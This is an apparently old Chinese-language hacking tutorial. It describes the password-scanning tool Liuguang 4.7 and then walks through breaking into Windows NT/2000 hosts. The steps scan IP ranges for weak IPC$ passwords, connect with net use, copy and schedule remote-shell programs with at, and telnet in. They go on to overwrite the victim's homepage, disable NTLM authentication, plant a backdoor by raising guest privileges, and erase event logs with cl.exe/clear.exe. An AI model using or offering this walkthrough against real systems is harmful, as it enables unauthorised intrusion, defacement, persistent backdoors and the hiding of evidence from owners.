流光

界面豪華，功能強大。功能簡介如下：1、用於檢測POP3/FTP主機中用户密碼安全漏洞。2、163/169雙通。3、多線程檢測，消除系統中密碼漏洞。4、高效的用户流模式。5、高效服務器流模式，可同時對多台POP3/FTP主機進行檢測。6、最多500個線程探測。7、線程超時設置，阻塞線程具有自殺功能，不會影響其他線程。8、支持10個字典同時檢測。9、檢測設置可作為項目保存。10、取消了國內IP限制而且免費。

流光4.7新增功能：

1、加入了本地模式，在本機運行是不必安裝Sensor。

2、Sensor掃描臨時結果文件(*.PTR)的尺寸大約減少了10倍。

3、後台掃描模式時，掃描的結果（*.PTR）可以直接通過附件發送到信箱。

4、Sensor的掃描速度加快。

5、減少了Sensor異常退出的BUG。

6、流光的界面和Sensor之間的通訊採用Triple-DES，密鑰的長度最多可到192bits，保證整個傳輸過程不可監聽。掃描的結果也只有在密鑰正確的情況下才可閲讀。

7、修正的控制服務，新的控制服務在升級Sensor時不再會失敗。

8、Sensor的服務名稱可以任意指定，控制服務和Sensor的進程名稱也可以任意指定。

9、支持XP（本地模式），很快會有98/ME的版本。

網名：

婚姻：已婚

資歷：中國CAD/CAM協會會員，高級程序員

格言：無論在現實或是網絡中，我都是孤獨的……

黑客原則：不能仇視社會，不能給別人製造麻煩，不能給別人帶來損失。

作者有權刪除此文章

IPC是指"InterProcess Communications",準確的説是ipc$，是默認的在系統啓動時的admin共享。

IPC$是Windows NT/2K中特有的遠程網絡登陸功能，它的特點是在同一時間內，兩個IP之間只允許建立一個連接。

注意，你試圖通過IPC$連接會在EventLog中留下記錄。不管你是否登錄成功。

可不可以通過IPC$暴力破解密碼？當然可以 ！ 不過，是不是太笨了點 …

2、首次啓動流光，會看到註冊的畫面，具體操作請參考本人第一篇教程。我們在主頁面上可以有幾種方法來通過IPC 探測獲得管理的權限。這裏我們要作的是得到一台跳板，那麼就可以用命中率高的辦法來探測了（測試一堆IP來得到弱口令）。

在主界面選擇 探測→探測POP3/FTP/NT/SQL主機選項，或者直接按Ctrl+R。

3、出先了上面的小窗口，輸入我們要破解的IP段，我們輸入了來看看。我們把“將FrontPage主機自動加入HTTP主機列表取消了”。因為我們只想獲得IPC弱口令，這樣可以加快掃描的速度 ，填入IP，選擇掃描NT/98主機

4、探測中……

（注意如果你要探測的是流光保留的國內的IP段，會被禁止的，也就是探測的時候信息欄出現"IP保留"的字樣）

有遠程主機的管理密碼了，我們剩下的就是想辦法控制它了，有什麼好辦麼？有的是 ！自己看看工具－菜單下的IIS遠程命令，是不是很簡單呢，我以後在説，今天還是先練習net 命令吧。

黑了他 ！

開個dos prompt 執行如下命令，本次用的例子。

1、 net use \\對方ip\ipc$ "密碼" /user:"用户名" || 建立遠程連接

2、 copy icmd.exe \\對方ip\admin$ || admin$是對方的winnt目錄， 這裏文件多。

3、 net time \\對方IP || 看看對方的本地時間

4、at \\對方ip 啓動程序的時間 啓動程序名 啓動程序的參數 || 用at命令來定時啓動程序，在這裏我們用soon這個程序來做也可以，它可以取代 3/4兩步。

5、 telnet 對方ip 端口 ||

6、輸入pass （如果不是用icmd.exe，或者沒有設置口令就不用了） ||

7、在開個窗口，繼續copy 我們用的東西。 copy sock.exe copy ntlm.exe copy cl.exe clear.exe

如果我們真的想黑了他，只需要把我們的首頁文件覆蓋目標的首頁就ok了，我們可以通過dir /s default.htm或者dir /s index.htm 來確定對方首頁的為止，一般是在X:\interpub\wwwroot\ .

假如首頁文件是default.htm並且在c:\interpub\wwwroot，這樣:copy default.htm \\ip\c$\interpub\wwwroot

8、其實黑人家是很低級並且沒意思的，我們最好是物有所有，作成跳板吧，今後幹活方便點：

執行我們copy 過去的ntlm.exe ，取消驗正。在給自己留個後門，比如提升guest的權限，或者其它的後門工具，這類東西多了自己選吧，看看殺手copy的那堆東西 。

9、還能做成其他的麼 ？

當然了，只要你有時間，並且願意做，我曾經偷偷的把自己的主頁放到人家的server上，速度快、空間無限，嘿嘿 。

10、日誌清除，斷開連接 ：

執行我們copy 過去的cl.exe clear.exe 都可以清除日誌，比如clear all ：清除所有的日誌。然後在斷開連接：net use \\ip\ipc$ /delete